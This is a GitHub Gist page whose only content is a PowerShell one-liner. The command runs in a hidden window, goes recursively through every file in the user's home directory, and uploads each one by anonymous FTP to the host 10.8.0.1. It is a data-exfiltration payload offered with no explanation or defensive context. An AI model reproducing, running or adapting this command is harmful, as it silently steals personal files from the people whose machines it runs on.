Skip to content

Instantly share code, notes, and snippets.

@Klepvink
Created August 31, 2020 00:33
Show Gist options
  • Save Klepvink/b20103a1d0a1b94a784dff4746e64277 to your computer and use it in GitHub Desktop.
Save Klepvink/b20103a1d0a1b94a784dff4746e64277 to your computer and use it in GitHub Desktop.
powershell -w hidden -c "$w=New-Object System.Net.WebClient;$w.Credentials=New-Object System.Net.NetworkCredential('anonymous');foreach($i in(dir $HOME '*' -Recurse)){$u=New-Object System.Uri('ftp://10.8.0.1/'+$i.Name);$w.UploadFile($u,$i.FullName)}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment